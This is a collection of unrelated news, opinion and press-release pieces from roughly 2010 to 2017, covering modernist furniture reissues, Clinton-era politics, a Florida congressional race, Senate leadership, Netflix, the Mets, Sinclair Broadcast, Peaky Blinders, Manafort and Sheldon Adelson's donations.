This back-to-the-future approach to design in 2015 can span many different eras , countries and functions . Swiss manufacturer Vitra has reissued a set of office furniture from the 1940s by Jean Prouvé , famous for his steel prefab houses . French company Ligne Roset has released a wall-mounted desk created by French designer Pierre Paulin in 1952 , before he became known for the Pop-like forms he used to furnish private rooms of the Élysée Palace . And Kansas-born designer Milo Baughman , known for his affordable and unpretentious pieces , is getting another look : His lounge chair , designed in 1966 , was revived at the behest of John Edelman , chairman of Design Within Reach . In short , it 's open season on the entire canon of 20th-century design .
Trading Places Reissues that can sub in for overused greats . Arched Triumph | Italian designer Gino Sarfatti 's Model 2129 pendant ( right ) , from 1969 , offers a fresh variant on the beloved curve of the classic Arco lamp ( inset , left ) , designed by Achille and Pier Giacomo Castiglioni . Just do n't expect a marble base to hold it in place—the 2129 attaches to the ceiling . FLOS by Gino Sarfatti Mod.2129 Lamp , $ 2,950 , | Italian designer Gino Sarfatti 's Model 2129 pendant ( right ) , from 1969 , offers a fresh variant on the beloved curve of the classic Arco lamp ( inset , left ) , designed by Achille and Pier Giacomo Castiglioni . Just do n't expect a marble base to hold it in place—the 2129 attaches to the ceiling . FLOS by Gino Sarfatti Mod.2129 Lamp , $ 2,950 , usa.flos.com 1 of 5 • • • • • 1 of 5 Show Caption Arched Triumph | Italian designer Gino Sarfatti 's Model 2129 pendant ( right ) , from 1969 , offers a fresh variant on the beloved curve of the classic Arco lamp ( inset , left ) , designed by Achille and Pier Giacomo Castiglioni . Just do n't expect a marble base to hold it in place—the 2129 attaches to the ceiling . FLOS by Gino Sarfatti Mod.2129 Lamp , $ 2,950 , | Italian designer Gino Sarfatti 's Model 2129 pendant ( right ) , from 1969 , offers a fresh variant on the beloved curve of the classic Arco lamp ( inset , left ) , designed by Achille and Pier Giacomo Castiglioni . Just do n't expect a marble base to hold it in place—the 2129 attaches to the ceiling . FLOS by Gino Sarfatti Mod.2129 Lamp , $ 2,950 , usa.flos.com
Judith Gura , a design historian and faculty member at the New York School of Interior Design , said that the new wave of reissues is easily appreciated because the pieces have the mostly clean lines and sculptural profiles of modernism . “ They do n't bear specific style characteristics that date them , like cabriole legs or acanthus leaves , ” she said . “ And because they are so simple , they mix well . ”
Matilda McQuaid , deputy curatorial director at the Cooper Hewitt Smithsonian Design Museum , points to a lack of interesting contemporary furniture designs as a factor . “ We have n't looked at the past as intensively as we are now , ” she said . “ Designers [ today ] are more interested in larger scale scenarios like urban renewal and urban planning. ” Hence , the rush to reveal the fresh appeal of old things .
A case in point : Until 1994 , Herman Miller only sold eight classic pieces , including the Eames lounge chair and George Nelson pedestal tables . Having rereleased the back catalog of George Nelson designs as well as those of the Eameses and Isamu Noguchi , the firm now has 53 classics in production , and reissues account for 10 to 20 % of its business . “ It 's not an exercise in nostalgia , ” said executive creative director Ben Watson , who has overseen the reintroduction of several of Alexander Girard 's works as well , a personal passion . “ We have an extraordinary legacy . ”
Previously unheralded women designers are belatedly getting their share of the limelight , too . Long-coveted designs by Swedish-born Greta Grossman and Kerstin Hörlin-Holmquist , whose pieces can fetch many thousands of dollars on the secondary market , are being produced again , thanks to Gubi , a Danish company that calls itself a treasure hunter . Long-lost classics by Le Corbusier associate Charlotte Perriand continue to be produced by Cassina .
A Classic , Now in Dressed-Up Versions Sometimes a well-known piece of furniture just needs new clothes . The Grand Confort armchair , designed in 1928 as a riff on the club chair , has long been iconic in its chrome frame . Now that frame comes in a jolt of colors , ranging from light blue ( show ) to green and ivory . LC2 Chair by Le Corbusier , Charlotte Perriand and Pierre Jeanneret , $ 3,220 , Cassina , 212-228-8186
And over the next year , homeowners hunting for alternatives to yawningly familiar designs like Isamu Noguchi 's coffee table ( knocked off so widely you can find a fake for $ 295 ) will have their choice of 12 innovative midcentury pieces by architect Lina Bo Bardi , never produced on a mass scale , care of Brazilian manufacturer Etel .
Though these reissues can depress values of the originals , they fill a need in the market , said Richard Wright , head of auction house Wright . Italian master Gio Ponti , for example , is a towering figure in design , but only the lucky could find his pieces . That is , until Italian company Molteni & C began a market correction three years ago by reissuing a few of Mr. Ponti 's pieces , including a small table from the mid-'50s .
The price is often right , as well . Another reissued piece , an armchair Mr. Ponti designed for his home in 1953 , costs $ 6,166 , still less than Arne Jacobsen 's oft-copied Egg Chair .
Carl Hansen & Son , the Danish furniture company begun in 1908 , has reissued the Colonial Chair—designed in 1949 by another forgotten modernist , Ole Wanscher—at a fourth of the price you 'd pay for an original in an antique shop . “ I do n't work with many architects who are still alive , ” said Knud Erik Hansen , a descendant of the company 's founder . “ Vintage is old enough to be in fashion again . ”
But what constitutes “ vintage ” is always changing , too . When Sheridan Coakley , co-founder of British firm SCP , wanted to celebrate his 30th anniversary in business this year , he decided to reintroduce several designs from its archives . “ When I started , people did n't buy contemporary furniture , ” said Mr. Coakley . “ They bought antiques . Now there 's a whole fresh audience . People are more at ease with modern design. ” One of his reintroductions was the first commercially produced piece by now-acclaimed British designer Jasper Morrison : a bar stool that came out in 1986 .
Corrections & Amplifications
The luxury shop Georg Jensen was located on Fifth Avenue in New York until it moved to Madison Avenue in 1970 . An earlier version of this article incorrectly implied that it was located on Fifth Avenue throughout the 1970s . ( August 25 , 2015 )
In July 2007 , former President Bill Clinton praised the benefits of “ open borders ” and “ easy immigration ” while delivering the keynote address at the 16th Telugu Association of North America ( TANA ) conference in Washington , D.C. , to a crowd of thousands of Indian Americans .
As the Los Angeles Times reported at the time , Clinton “ drew applause at a conference of 14,000 Indian Americans in Washington as he extolled the benefits of ‘ open borders , easy travel , easy immigration . ' ” It went on to report , “ The same day , he headlined a fundraiser at the conference for his wife 's [ failed 2008 presidential ] campaign . ”
As he hailed the virtues of “ open borders , ” Clinton told the crowd that there is no stopping this mobility and globalization :
The modern world is obviously full of opportunity . … With open borders , easy travel , easy immigration , you see these things happening all over the world . We are increasingly bound together . And with more than a trillion dollars crossing national borders every year , even if we repealed all the trade agreements in the world , you could n't stop a lot of this globalization and mobility .
Clinton 's 2007 speech seemed to build upon to earlier arguments he has made , in which he 's argued that “ the great mission of the 21st century is … to move from mere interdependence [ of individual nations ] to integration ” and “ to create a genuine global community … that has shared responsibilities , shared benefits and shared values . ”
Clinton previously explained that under this worldview , “ America has greater obligations to open our borders and to invest more in the development of poor countries . ”
Clinton 's previous forthright declarations of support for “ open borders ” seem to undercut claims made by many in corporate media today , who insist that the Clintons do not support open borders .
In his 2007 speech , Clinton elaborated on his vision for developing a “ global community ” —suggesting that the creation of these transnational “ integrated communities ” would be paid for by wealthy nations , like the United States . For instance , Clinton even seemed to go as far as to suggest that wealthy nations should cover the cost of educating every child in the world :
This is an unsustainable world . So in our relations with each other and within our own communities and nations , we have to go beyond an interdependence that is unequal , unstable and unsustainable . We have to build integrated communities of shared opportunities , a shared sense of responsibility for success , a genuine sense of belonging . … The good news is , we actually know how to do a lot of this . We know what it would cost to put every child in school who 's not in school , and we know what — if the wealthy countries of the world chose to pay for it , we know that it would n't be aid ; it would be an investment in the world 's future . We also know what it would cost to build effective health systems to deal with AIDS , TB , malaria , other tropical diseases , maternal and child health . And it should be seen not as aid but as an investment in a common future .
Perhaps most radically , Clinton seemed to suggest that the world ought to view its obligations to one another in the same way as would “ one nation ” — and that America ought to care for the global impoverished population in the same way that America would take care of its own impoverished U.S. citizens :
When I was a young boy , barely old enough to be aware , in the late 1940s , there were still places in my home state , in Arkansas , which had a per-capita income of only half the national average . There were places in my home state that had no electricity ; that had only well water , no running water ; that had no sanitation ; even that had no telephones . There were a few rural places that had no telephones , in my lifetime . Soon enough , all of those places were reached , those remote rural villages that were quite poor . No one thought of it as aid , because we were all in one nation . It was viewed as an investment . That 's the way the world has to look at every place that needs income , education and health care . ( Applause . ) It 's an investment , because we 're all tied together . We know how to do that .
Indeed , Clinton seemed to call for the development of a global identity which brings with it a “ genuine sense of belonging ” to the entire world . Clinton even seemed to suggest that if people do not come to identify themselves as citizens of the world , then all of his life 's work of launching global initiatives will be nothing more than “ a pathetic failure . ”
“ Identity . I want you to think about it , ” Clinton said . He added :
Gandhi understood this . … Ghandi knew from the depths of his soul about our common humanity . So none of us are that great , but we do n't have to be that great anywhere . We are on this little bitty planet . There are — we now know there are hundreds of billions of planets in the universe . … . But the whole world 's future comes down to this : How do we identify ourselves ? … . Our whole mind , our whole being is wired toward making distinctions … knowing the difference between men and women and tall and short , old and young . That 's how brains work . But if we lose the sense that our common humanity matters more in a world where everything is related , then all the things I have said today about climate change , health care , education , everything else is totally irrelevant , and every little feeble effort I have made in my life to bring together while others are trying to tear them apart will be a pathetic failure . That is what I ask you to think about . … What is keeping us from it is an inadequate sense of identity , a sense of belonging , that we belong together .
“ We certainly do n't want to homogenize the world , ” Clinton added . “ But when we believe that our distinctions are so important that they obliterate the significance of our common humanity , in an interdependent world we are bound for constant trouble because we can not escape each other . ”
“ I think the most important challenge of the world is how we think and feel and teach our children to think and feel , ” Clinton said . “ America has been following a foreign policy in the last few years that basically says we will act alone when we can and cooperate when we have to . In an interdependent world , you have to cooperate whenever you can and act alone only when you 're forced to . ”
The Los Angeles Times noted that during his speech , Clinton also said that he was bothered by the criticisms of outsourcing “ because it failed to acknowledge the contributions of Indians who settled in the U.S . ”
Clinton said :
When I see all of you here — and I read in the press all the time about — stories about outsourcing , which bothers me , but what about all the insourcing ? ( Chuckles . ) Look at what you did for America . Look at how many of you are here — ( applause ) — how many jobs you 've created , how many people work for you . … The prosperity enjoyed by the Indian community in the United States is evidence of what is good about the global economy .
Clinton also praised the immigration policies resulting from the 1965 Ted Kennedy immigration rewrite , which lifted the immigration curbs enacted by President Calvin Coolidge and opened up American visas to the entire world .
“ America is so much more interesting a place today than it was 30 years ago because we have people from everywhere here , ” Clinton said . “ And we know that all these distinctions and these differences add to the search for truth and help us to push back the barriers of all the problems we have .
Clinton 's suggestion that the large-scale insourcing of foreign nationals represents what is good about the global economy is perhaps interesting .
As Breitbart News has reported , the Clintons have extensive ties to India-based corporations , such as Tata and HCL , that import foreign workers from India into the United States on H-1B and L-1 visas to help corporations lay off and replace American workers with foreign laborers who will work for a fraction of the wage .
During the heated 2008 Democratic presidential primary , Hillary Clinton came under fire for her helping India-based firms that insource low-wage foreign nationals to displace American workers .
In fact , Bill Clinton 's 2007 remarks to the Indian American conference came just one month after the campaign of then-Senator Barack Obama had challenged the Clintons ' questionable “ personal , financial , and political ties to India ” — going so far as to identify his Democratic primary opponent as “ Hillary Clinton ( D-Punjab ) , ” suggesting that she represents foreign nations and foreign citizens rather than her own American constituents .
The line was a reference to a joke Clinton had made in which she told a group of Indian Americans that she saw herself as the elected representative of foreign citizens in the Indian region of Punjab . “ I am delighted to be the Senator from Punjab as well as from New York , ” Clinton reportedly told attendees of the 2005 Sikh American Heritage dinner event held in the U.S. Senate .
A 2007 report from the Los Angeles Times highlighted Clinton 's “ bind ” as she sought to “ woo ” wealthy Indian donors— to whom she 'd “ telegraph ” her longstanding support for outsourcing American jobs and insourcing foreign workers— while at the same time launching her eventually failed effort to win over Democratic primary voters , who were skeptical of such practices .
“ Clinton is successfully wooing wealthy Indian Americans , many of them business leaders with close ties to their native country and an interest in protecting outsourcing laws and expanding access to worker visas , ” the Los Angeles Times wrote , noting that “ her campaign continues to telegraph — sometimes in front of Indian American audiences — that she sees benefits to a globalized world . ”
The Los Angeles Times wrote that such efforts “ signaled that Clinton , who portrays herself as a fighter for American workers , had aligned herself with Indian American business leaders and Indian companies feared by the labor movement . ”
“ Some U.S. worker organizations say Clinton can not claim to support American workers if she is also helping Indian outsourcing companies and proposing more worker visas , ” the Times reported .
This weekend Alan Grayson released his third negative television advertisement against Daniel Webster . So far , Grayson 's negative ads have outnumbered his positive ads ( 3-2 ) . It is clear that Mr. Grayson would rather talk about issues from twenty years ago than the issues of the past two years . First Grayson mislead voters about a stairway , then he misleads them regarding Mr. Webster 's inability to serve in our military , and now Grayson compares Webster to the Taliban .
`` Alan Grayson 's latest attack on my husband is shameful . Mr. Grayson seems to have a problem telling the truth and no problem misleading the public , '' said Sandy Webster , who has been married to Daniel for thirty-eight years . `` Dan has been an amazing husband and father , and the finest man I have ever known . Mr. Grayson should be ashamed of his nasty smears against my husband . ''
Alan Grayson compares Webster to the Taliban , but the odd thing is that Grayson does n't even support our troops efforts in the Middle East to combat the Taliban or other Muslim extremist groups .
`` Alan Grayson is at it again , misleading voters with nasty negative ads against Senator Webster . Mr. Grayson is certainly no champion of respecting women , he even publicly called a woman a ' K Street whore . ' To compare Daniel Webster to the Taliban is ludicrous , '' said Webster Spokesman , Brian Graham . `` Alan Grayson is simply trying to distract voters from his record of higher taxes , increased debt , and rising unemployment . Central Florida deserves better than Mr. Grayson 's gutter-politics . ''
Daniel Webster , a family man and small-business owner , has dedicated himself to serve the citizens of central Florida with honor and integrity . Daniel Webster served as Majority Leader of the Florida Senate and the first GOP Speaker of the House in over a century .
Daniel Webster has been endorsed by the National Rifle Association , the American Conservative Union , the House Conservatives Fund , Governor Jeb Bush , Governor Mike Huckabee , Governor Bob Martinez , US Senator George LeMieux , US Senator Connie Mack , Congressman Mike Pence , Agriculture Commissioner Charles Bronson , former Comptroller Bob Milligan , former Chief Financial Officer Tom Gallagher , former Secretary of State Sandra Mortham , Orange County Mayor Rich Crotty , Orange County Clerk of Court Lydia Gardner , Orange County Property Appraiser Bill Donegan , Orange County Commissioner Fred Brummer , Orange County School Board Member Christine Moore , former RPOF Chairman Tom Slade , former Senate President Ken Pruitt , former RPOF Chairman Van Poole , former Senate President Tom Lee , former Speaker Tom Feeney , former Senate President John McKay , former Speaker Allan Bense , and former Senate President Jim Scott .
Senate Minority Leader Harry Reid 's ( D-Nev. ) announcement Friday that he will not seek reelection next year has progressive groups licking their chops at the prospect of seeing Sen. Elizabeth Warren Elizabeth Ann WarrenSanders : 'Damn right ' I 'll make the large corporations pay 'fair share of taxes ' House to push back at Trump on border GOP Sen. Tillis to vote for resolution blocking Trump 's emergency declaration MORE ( D-Mass . ) as the Democratic leader .
New York Sen. Charles Schumer , currently Democrats ' No . 3 in the Senate , is the heavy favorite to succeed Reid , but progressive groups have other ideas .
Democracy for America ( DFA ) is urging Warren to run for president , but says that if she passes , they 'd back her or someone from her wing of the party as the next Democratic leader in the Senate .
ADVERTISEMENT
“ There are real concerns about whether Chuck Schumer should be the frontrunner for leadership in the Senate among progressives , ” DFA spokesman Neil Sroka told The Hill . “ The Wall Street wing of the party , that Chuck has been close to , is dying , and the Warren wing is rising . So if Sen. Warren chooses not to run for president … she should run for leader of the Senate . She 'd make a great leader . ”
The Progressive Change Campaign Committee echoed that sentiment , predicting the race for Democratic leader wo n't be a coronation for the establishment members of the party believed to be next in line .
“ Her lifetime of fighting for the little guy against Wall Street power … shows she can think big , wage tough fights against powerful interests , and win key votes in the Senate , ” the PCCC said in a statement . “ She 's the definition of a leader . … There will likely not be a coronation to replace Harry Reid as Senate Democratic Leader , and Elizabeth Warren is right up there with others as someone who would be taken very seriously . ''
Warren 's office on Friday morning said she would not run for the leader 's spot .
In addition to Schumer , Senate Minority Whip Dick Durbin ( D-Ill. ) and Senate Democratic Conference Secretary Patty Murray ( D-Wash. ) could be in the mix .
But in Senate races playing out across the country , the progressive groups have shown they 're thirsty for new blood in the party . They credit Warren with bringing their primary initiatives , like the expansion of entitlement programs , into the mainstream .
Both the DFA and the PCCC cited Thursday 's vote on a Warren amendment to expand Social Security benefits , which was backed by 42 Democrats in the Senate , as evidence the Massachusetts Democrat already has the gravitas to lead the party .
“ Nearly the entirety of the Democratic caucus voted to expand Social Security benefits last night , ” Sroka said . “ She 's shown the ability to lead in the caucus and there 's no doubt she could be a real force for the party . ”
Updated at 12:36 a.m .
Alexander Bolton contributed .
Netflix is far from being the only streaming service out there but they are certainly one of the most popular and according to a recent survey , Netflix ' original programming is now more popular than that of the content on HBO . For all of Netflix ' strengths though they still lack an offline viewing feature for subscribers which is something that users can get elsewhere . Amazon 's Prime Video for example has allowed members of the service to download movies and TV shows to watch offline for a while , and with the launch of the standalone Amazon Prime Video application at just $ 8.99 a month , Prime Video just might start to sound more enticing to potential customers .
For loyal Netflix fans , it 's been reported that the streaming service may be considering adding an offline viewing feature to their service at some point in the future . Although it was never explicitly stated , Netflix CEO reportedly mentioned that the company should keep an open mind about the option for viewers which suggests that it may be on the table and could already be in the works , which would give Netflix a little more breathing room and it just might get people to use the service more , or it could even bring in new subscribers who may be without internet often enough that streaming just is n't an option .
Netflix refers to global expansion of their service to regions where the internet connections may not be as strong and fast as those in other regions , which sounds like a good enough reason to start thinking about adding something that would make it easier for Netflix to reach more people . Short of potentially grabbing new subscribers in countries where the internet is few and far between , it would help Netflix here in the U.S. as well as people would be able to download films and TV episodes while connected to a local or public WiFi network , and then save the content for viewing later when they may have either no internet connection at all or may just want to save their network data . At the moment , offline viewing for Netflix is likely a long ways off if it 's even going to make into the service at all , but `` keeping an open mind about it '' is better than hearing that it wo n't be an option .
June 1 , 2012 ; Flushing , NY , USA ; New York Mets starting pitcher Johan Santana ( 57 ) reacts after throwing the first no-hitter in Mets history against the St. Louis Cardinals at Citi Field . Mets won 8-0 . Mandatory Credit : Debby Wong-USA TODAY Sports
Disclaimer : be prepared to spend some time here .
…that Johan Santana came back from major shoulder surgery to pitch five scoreless innings on Opening Day ?
Or two weeks later when David Wright homered on his first pitch back from suffering a broken pinky ?
Remember when Scott Hairston hit for the cycle in Colorado ?
How about when Justin Turner worked a pinch-hit 13-pitch walk off Heath Bell , just so Kirk Nieuwenhuis could break out the brooms and sweep Jose Reyes and the Marlins back to Florida ?
In early May , Jordany Valdespin managed to get his first big league hit and bring back nightmares for Jonathan Papelbon in a single swing . Two months later , David Wright ruined another night for Papelbon with a walk-off bloop single .
Speaking of Valdespin , how about the other four times he came off the bench to hit a long ball ?
How about when Jeremy Hefner decided he did n't need a pinch hitter and hit the game-winning homer himself against the Phillies ?
Mike Nickeas taught us that men with great hair can drop the small ball or launch the big fly . After a recent two-year stretch without a grand slam , 2012 saw several with Ike Davis hitting one against Baltimore and Scott Hairston sending a Casey Coleman slider over the ivy in Chicago . Even Jason Bay got in on the act , finding the only people to buy Marlins tickets in September .
Remember how it felt seeing Daniel Murphy finally get his first home run 76 games into the season ? And when he had to wait all of an inning for his second ?
Or just how good Ike Davis was in the last four months of the season , especially in Arizona ?
Remember when Matt Harvey struck out the first major league hitter he faced , and followed it up by striking out 11 of the next 22 ? And a month later , while we were still in awe , Collin McHugh wowed us once again , striking out 9 Rockies in his first taste of the bigs .
R.A. Dickey threw the game of his life on June 13th : a one hit , 12 strikeout shutouts of the Tampa Bay Rays . Then he threw the game of his life 5 days later at Citi Field , striking out a career-high 13 Orioles against only a single hit . The summer of Dickey did n't end there of course , running all the way to 20 wins and a Cy Young award .
Where were you when David Wright continued his ascension into the Mets ' record books last year , breaking the franchise RBI and hits records in shockingly disparate fashion .
Jonathon Niese struck out a career-high 10 batters in early June , one day after Dickey struck out nine in a 7-hit shutout . The day before that , Johan Santana struck out eight ( notice a pattern ? ) . That eighth strikeout came on arguably the most iconic pitch thrown in Queens since Jesse Orosco struck out Marty Barrett in 1986 . On June 1st , in the franchise 's 8020th game , it has happened . And not without the sacrifices of a certain hometown kid .
Look , I know that it 's been a tough offseason . R.A. Dickey is in Toronto . The outfield ( Lucas Duda , Nieuwenhuis , and Mike Baxter ) has been much lambasted . The bullpen is n't great , but most are n't .
The Mets probably are n't going to be as bad as the Post is inevitably going to tell you . No one knows how good they 'll be , it 's not even March . What we do know , however , is that even with a fourth place finish , we can expect to be captivated , to be amazed , to see something unexpected .
Baseball is back . The Mets are back . Win or lose , that 's awesome .
Thanks for reading ! Be sure to Like Rising Apple 's Facebook page and follow @ RisingAppleBlog on Twitter to keep up with the latest news , rumors , and opinion .
After a busy summer for Sinclair , during which it was fined by the FCC for bad-faith broadcast-retransmission negotiating just before signing a multi-million dollar retrans deal with top pay-TV operator Comcast , the nation 's largest station group has embarked on a campaign to let consumers know they do n't need the pay-TV ecosystem to enjoy their local broadcast stations .
Sinclair Broadcast Group , which controls 173 network affiliates in 81 markets , has partnered with NAB-backed TV Freedom and Antennas Direct for what 's being billed as the “ Broadcast TV Liberation Tour . ”
According to a TV Freedom press release , the group 's tour bus will over the next two weeks visit Little Rock , Arkansas ; Macon , Georgia ; Charleston , South Carolina ; Asheville , North Carolina ; and Baltimore , Maryland ; seeking to raise awareness among consumers that they “ can access dozens of local broadcast TV channels via an advanced digital antenna in high-definition for free . ”
FREE DAILY NEWSLETTER Like this story ? Subscribe to FierceVideo ! The Video industry is an ever-changing world where big ideas come along daily . Cable , Media and Entertainment , Telco , and Tech companies rely on FierceVideo for the latest news , trends , and analysis on video creation and distribution , OTT delivery technologies , content licensing , and advertising strategies . Sign up today to get news and updates delivered to your inbox and read on the go . SUBSCRIBE NOW
The tour 's promotors say the tour has visited more than 60 U.S. cities so far and handed out more than a $ 1 million worth of broadcast antennas for free .
“ We are proud to be working with Sinclair TV stations at each tour stop to provide TV antennas to so many people seeking to access their local news , lifeline weather coverage and the most popular entertainment programming on television for free , ” said Richard Schneider , president of Antennas Direct , in a statement .
Of course , with retransmission fees set to reach $ 10.6 billion by 2020 , and the nation 's leading station owner spearheading that growth , it 's puzzling just what Sinclair is trying to liberate its customers from .
For its part , TV Freedom said it 's just going where the viewers are — well , at least a few of them , anyway .
Citing GfK research , the lobbying group said the percentage of Americans who get their TV primarily from broadcast antennas is up from 15 percent to 17 percent year-over-year .
For more :
- read this TV Freedom press release
Related articles :
Comcast re-ups retrans deal with Sinclair
Sinclair fined $ 9.5M by FCC for violating good-faith retrans bargaining obligations
Sinclair says FCC actually 'delayed ' new deal with Dish , did n't help lead to it
SNL Kagan revises projected 2020 retrans figure again , moves it up to $ 10.6B
The BBC have today released promotional pictures for the second episode of the third series of hit gangster series , Peaky Blinders . Set in Birmingham after the First World War , the series centres on the exploits of mob boss Tom Shelby ( Cillian Murphy ) and his gang known as the Peaky Blinders . The second episode of the new series is set to air on Thursday the 12th of May on BBC 2 from 9:00pm to 10:00pm . A synopsis for the second episode of Series 3 can be found below along with more promotional pictures :
On the orders of the secretive Economic League , Tommy goes to London to meet the wildly eccentric and volatile Duke Leon . He soon discovers the extreme lengths his new paymasters are willing to go to in their quest for power .
In Birmingham , John 's temper gets the better of him , and a personal dispute with the Italians threatens to explode into a devastating war .
As Tommy struggles to regain control of the situation , he finds out how extensive his new enemy 's hold on the Peaky Blinders is .
With thanks to BBC Media .
Advertisements
Why did Hillary Clinton lose ? Check out the talk-show circuit and she 'll be glad to tell you . Her new book , What Happened , is less of a mea culpa than a j'accuse , at once hurt , baffled and outraged . The villains are James Comey , Bernie Sanders and Donald Trump , more or less in that order . And yes – she also lost because she was a woman .
`` I started the campaign knowing that I would have to work extra hard to make women and men feel comfortable with the idea of a woman president , '' she told Jane Pauley .
Many feminists agree that rampant sexism did her in . `` What actually happened to Hillary Clinton reeks of misogyny , '' Rachael Revesz wrote in The Independent . `` It reeks so badly that you can smell it stronger than a sniffer dog can suss out crack cocaine . ''
Story continues below advertisement
According to Ms. Clinton , minorities will stick together but women wo n't – which explains why Barack Obama could be elected but not her . `` Race is a much more motivating factor for voters than gender is , '' she told Matt Lauer .
Also , women let themselves be pushed around by men . Her friend Sheryl Sandberg told her so . In a conversation with NPR , Ms. Clinton said Ms. Sandberg had advised her that `` women will have no empathy for you , because they will be under tremendous pressure – and I 'm talking principally about white women – they will be under tremendous pressure from fathers and husbands and boyfriends and male employers not to vote for 'the girl . ' ''
The coup de grâce , according to Ms. Clinton , was former FBI director James Comey 's announcement – just a few days before the election – that her e-mails were under further investigation . Why ? Because women were scared off . `` I have so much anecdotal evidence for this , '' she told Ezra Klein . `` You know , all of a sudden the husband turns to the wife : ' I told you , she 's going to be in jail , you do n't want to waste your vote . ' The boyfriend turns to the girlfriend and says , 'She 's going to get locked up ! ' All of a sudden it becomes a very fraught kind of conflictual experience . And so instead of saying I 'm taking a chance , I 'm going to vote , it did n't work . ''
To which one is tempted to respond : If women are such spineless wimps , they really do n't deserve a female president .
Women in politics are doomed by male testosterone , we 're told . So goes the conventional moaning . It is astonishing that feminists conveniently ignore that other female politician – Angela Merkel . She has been in power for an astonishing 12 years , and will almost certainly win another term this fall . She is the most successful leader in the Western world . Now that the United States has been hijacked by a rogue President , she is its moral leader as well .
In many ways , Frau Merkel is the anti-Clinton . She never plays the women card . She does n't like the word `` feminism . '' As Nellie McClung once counselled , she just gets the thing done and lets them howl .
Ms. Merkel 's bland demeanour and soporific speaking style conceal a superbly analytical mind . She also has what one journalist called `` a perfect instinct for power . '' ( George Packer 's definitive New Yorker profile is a gold mine of insight into this extraordinary woman . ) As a woman , a scientist ( quantum chemistry ) , and a product of East Germany , she was a triple outsider in German politics – and also a stark contrast to the chain of preening , macho men who preceded her .
Story continues below advertisement
Story continues below advertisement
Ms. Merkel breaks all the rules . She never tries to charm . Her hair seems never to have met a stylist . She resembles a frumpy German housewife , not a corporate CEO . She does n't care about working women or gay rights .
One other thing . She 's ruthless . Ms. Clinton bitterly complains that she was `` shivved . '' By contrast , Ms. Merkel wields the shiv . `` If you cross her , you end up dead , '' one source told Mr. Packer . `` There 's a whole list of alpha males who thought they would get her out of the way , and they 're all now in other walks of life . ''
Germany and the United States are two different worlds , of course . The United States is intensely polarized , and Germany is not . My point is that there are many , many ways for women to succeed in politics , and Ms. Clinton 's way is only one of them . Feminists have an irritating habit of assuming that only female politicians with overtly feminist agendas are legitimate , and that all others ( Margaret Thatcher , for example ) are gender traitors and/or pseudo-men . Maybe that 's why they are oblivious to Ms. Merkel .
Hillary Clinton is right when she says that women in public life face extra challenges . But she 's wrong when she implies that a defeat for her was a defeat for women . And it 's doubly insulting for her to suggest that women are so weak-minded that they stayed home or voted against her just to appease their men .
She did n't lose because she was a woman . She lost because she was the wrong one .
Paul Manafort registering with U.S. government as foreign agent
A spokesman says former Trump campaign chairman Paul Manafort is registering with the U.S. government as a foreign agent . | AP Photo
WASHINGTON — President Donald Trump 's former campaign chairman is registering as a foreign agent .
Paul Manafort 's spokesman says he was in talks with the government about registering before the 2016 election and is now “ taking appropriate steps ” in response to “ formal guidance ” from the government .
The spokesman says Manafort 's lobbying work was not conducted on behalf of the Russian government and began before Manafort started working with the Trump campaign .
It 's unclear whether Trump was aware that Manafort was in talks with the government about registering before he hired him .
Michael Flynn , who was fired as White House national security adviser in February , has also had to register as a foreign agent for lobbying work he did with ties to Turkey .
The Shins frontman James Mercer did n't set out to make an app . A heavy Instagram user , he simply wanted something to make a quick photo collage . But not the kind that just plops a few photos into a grid . You know , an actual collage , like the kind you made in elementary school .
But after hunting through the App Store , he was surprised that he could n't find one . So he decided to make his own .
`` It was just that moment of wanting something that did n't exist , '' says Mercer .
That was the genesis for Pasted , Mercer 's whacky collage app that 's due out next month ( and just so happens to coincide with The Shins first album and tour in five years ) .
Pasted uses a combination of effects most users will be familiar with — filters , stickers , brightly colored backdrops — and a lot of masking , which enables the `` homemade '' look . Import a bunch of photos from your camera roll and the app uses some basic image recognition to detect which parts are likely to be the most interesting .
A post shared by The Shins ( @ theshins ) on Aug 10 , 2016 at 5:54pm PDT
From there it creates a bunch of cutouts ( you can customize them yourself as well ) and you can layer stickers , stylized filters and the colorful backgrounds on top .
The aesthetic is a bit like Prisma — if Prisma was more `` punk rock . ''
Mercer , who is a self-described `` not a tech guy , '' enlisted the help of Zeke Howard , a partner at the Portland-based design studio The Brigade , on the app . Though he says he was heavily involved in the aesthetic and user interface aspects of Pasted .
A post shared by The Shins ( @ theshins ) on Aug 31 , 2016 at 11:53am PDT
He 's already designed T-shirts and cover art for his band 's first single using the app and says he hopes other bands will do the same .
`` I remember being at Kinkos back in the 90s making fliers for my band . You 'd draw something , maybe write out some text or something , and then you 'd blow it up and then you 'd get that sort of posterization effect that happens with the Xerox .
`` I would love to see bands able to do things on the fly when they 're on tour . ''
A post shared by The Shins ( @ theshins ) on Sep 2 , 2016 at 6:30am PDT
As for whether the app is more of a side project or an actual business seems somewhat up in the air .
There are no firm plans for monetization , but he says they are toying with the idea of offering different sticker packs — perhaps to promote bands they like or local artists — for an in-app purchase .
When I I point out that a tour could be an excellent place to promote a new app as well , he concedes that he 'd like to be able to share it with his fans , but is cautious about overselling it .
`` I 'll promote it , but in a gentle way , '' he says .
6 years ago
Washington ( CNN ) - Thanks to $ 10 million in new donations from Nevada billionaire Sheldon Adelson and his wife , the pro-Romney super PAC Restore Our Future raised more than $ 20 million during the first half of this month , according to a financial disclosure form filed with the Federal Election Commission Thursday .
The group had more than $ 36 million cash on hand , and spent $ 12 million , as of October 17 .
- Follow the Ticker on Twitter : @ PoliticalTicker
- Check out the CNN Electoral Map and Calculator and game out your own strategy for November .
The haul so far in October is almost as much as it raised in August and September combined .
The new contributions by the Adelsons bring the couple 's total to Restore Our Future to $ 20 million .
Restore Our Future launched a major swing state ad campaign earlier this week , buying almost $ 18 million worth of commercial time in 10 states .
For the Adelsons , who rank as the top givers to outside political groups according to the non-partisan Center for Responsive Politics , this latest donation means they have given at least $ 61 million this campaign cycle to entities which have to disclose their donors : super PACs , campaign committees and candidates .
Mr. Adelson is a controversial Nevada magnate who operates casinos both in Nevada and overseas .
He has been the highest profile Republican donor this election cycle because of the growing influence of super PACs and his willingness to give to them . He and his wife donated millions to Winning Our Future , the super PAC that was largely responsible for helping keep Newt Gingrich in the GOP primary contest .
After Gingrich dropped out , Adelson was at first reluctant to support Romney . After several meetings and conversations , however , Adelson decided to embrace the Republican nominee . One reason , associates have said , is because Adelson is determined to do all he can to make sure President Barack Obama is not re-elected . Another key objective for him is the safety of Israel , and he believes Romney would be a stronger friend of the Jewish state than Obama , friends have said .
Adelson hosted a fund-raiser for Romney and went to Israel to join the Republican nominee during his July trip .
